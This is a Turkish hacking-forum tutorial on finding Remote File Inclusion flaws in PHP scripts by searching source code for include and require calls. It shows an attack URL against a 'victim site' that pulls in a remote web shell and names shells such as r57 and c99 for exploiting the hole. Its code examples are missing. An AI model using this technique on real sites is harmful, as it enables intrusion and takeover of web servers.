RFI Basit Açık Bulma Yöntemleri -

[JaRu|e]

Öncelikle herkese selamlar.. Kendimden biraz bahsedeyim.. Ben yaklaşık 2 yıldır farklı nicklerle StarHack'de takılan birisiyim. Buraya ilk kaydoldugum gün HTTP ile HTML yi birbirine karıştırırdım.. Bu sitenin çok ekmeğini yedim bana çok yardım ettiler. Starhack'de öğrendiklerim sayesinde rüyalarımda bile isimlerini göremiyeceğim kişilerle çalıştım. Ve bu son zamanlarda bazı gereksiz insanların sitenin amacını sapıttığını gördüm ve elimden geldiğince paylaşım yapmak ve starhack'e borcumu ödemek ve starhack'i yine o eski şaşalı günlerine çevirmek için tek başıma başlıyorum... Tamamen kendi ellerimle yazdığım dökümanlarımı göreceksiniz..



Neyse lafı uzatmadan RFI ( Remote File Inclusion ) açık bulma yöntemlerine bir başlayalım...



öncelikle biraz rfi dan bahsedeyim..



RFI açılımı olarak Remote File Inclusion'dur yani türkçe karşılığı olarak Uzaktan Dosya Enjekte etmektir ama biz buna hacking aleminde daha çok Uzaktan Kod Çağırma diyoruz..



Mantığına gelince de;



PHP Coderların sayfaları kodlarken kullandıkları string (yumak) ve variable (değişken) lerin tam olarak kontrol edilmemesinden dolayı her zaman war olan ve war olmaya devam edecek olan bir güvenlik açığıdır. Neden böyle söyleyebiliyorum? Çünkü 2-3 gün boyunca bir an bile durmaksızın kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolayı kodlarda açık werecektir. Neyse lafı fazla dolandırmadan örnek vereyim..



Hepimizin bildiği ve bu sitede de kullanılan vBulletin script'ini ele alalım. ( artı parantez vBulletin'in popüler versiyonları olan 3.6.x serisinde bugune kadar rfi açığı bulunduğunu duymadım bilmiyorum. Sadece örnek olsun diye bu scripti ele aldım. )



Nası bulunur? Kullanımı nası olur?



Açık tespit etmek için öncelikle PHP den orta seviye de anlamamız gerekiyor. şimdi adım adım açık bulmayı anlatayım..



Öncelikle açık bulmak istediğiniz scriptin kaynak kodlarını bilgisayarınıza download ediyorsunuz. Bu örnekte biz vBulletin scriptini indiriyoruz. ve araştırmaya başlıyoruz. Mesela " index.php " dosyasını araştırmak istiyoruz..



O zaman index.php dosyasını bir text editörü yardımı ile açıyoruz örnğin Not Defteri.. ve hemen kodları incelemeye başlıyoruz..



Araştırma kriterlerimiz;



include

include_once

require

require_once



fonksiyonlarıdır. Hatta bir iyilik daha yapayım ve bu fonksiyonların PHP ne işe yaradığını anlatayım.. Daha etkili olur..



Şimdi bildiğiniz üzere web-sitelerinde dolaştığınız her sayfa tek tek sıfırdan yapılır.. Özellikle HTML site kodlandığı zaman her sayfa için aynı kodları tekrar tekrar girmek zorunda kalırsınız ama PHP bu yönüyle ve diğer yönleriylede HTML den oldukça üstündür ve include ve require fonksiyonları sayesinde sabit bir sayfayı farklı amaçlarda kullanabiliriz. yani anlatmak istediğim şey mesela bir inşaat şirketinin sitesini PHP olarak kodluyosunuz ve header dediğimiz yukarıda yani banner ve çevresini kapsayan kısım anasayfadan tutunda kontak sayfasına kadar heryerde aynı değişen tek şey sadece ortada bulunan yazıların bulundugu yer.. Şimdi anasayfa ve kontak sayfası için tek tek kodlama yapmaktansa ust.php diye bir kere kodlarız ve anasayfa.php ye aşağıdaki kodu ekleriz;







daha sonra ayasayfa.php dosyasını çalıştırdığımız zaman ust.php nin anasayfa ile bütünleşerek çıktığını görürsünüz ve bu kodu her sayfanız için yazarsanız otomatikmen kolay bi şekilde ust.php dosyasını istediğiniz yere ENJEKTE edebilirsiniz.. " Dikkat : ENJEKTE " Şimdi include ve require fonksiyonlarının mantığını anladığınızı varsa***** kaldığımız yere geri dönelim..



index.php dosyasını açtınız ve include, include_once, vb. gibi bir kod gördünüz..



Az önceki örneğe devam edelim;







Yukarıda gördüğünüz PHP kodu bulundugu sayfaya aynı dizinde bulundugu ust.php dosyasını çağırmaktadır. (Dikkat : ÇAĞIRMAKTADIR ) Şimdi biz ne yapabiliriz bu koda? Hemen düşünürüzki acaba coder " DOSYA ÇAĞIRMA " işlevini sınırlandırmışmıdır yani sadece bulunduğu dizinden mi dosya kabul ediyor?? Hemen bi deneme yaparız.;



index.php dosyasındaydık ve " orchid " parametresini kullanarak ust.php dosyasını çağıran yukarıda ki kodda açık arıyoduk, deneme - yanılma yapalım..



kurbansite.com/index.php?orchid=http://SHELL?



Ve girdik.. Şimdi az önce UST.PHP nin bulundugu yerde bizim shellimiz war.. Böylece ilk adımı attık ve açığımızı bulduk bundan sonra artık r57, c99, fatalshell, ekin0xshell ne kullanırsanız kullanıp bulduğunuz açığı sömürün (exploit = Sömürmek)



Şimdilik bu kadar yeter..



Sırada Local File Inclusion (LFI) bulma ve kullanma yöntemleri





Beyaz Renkle yazmaa... bişi anlasılmıyor..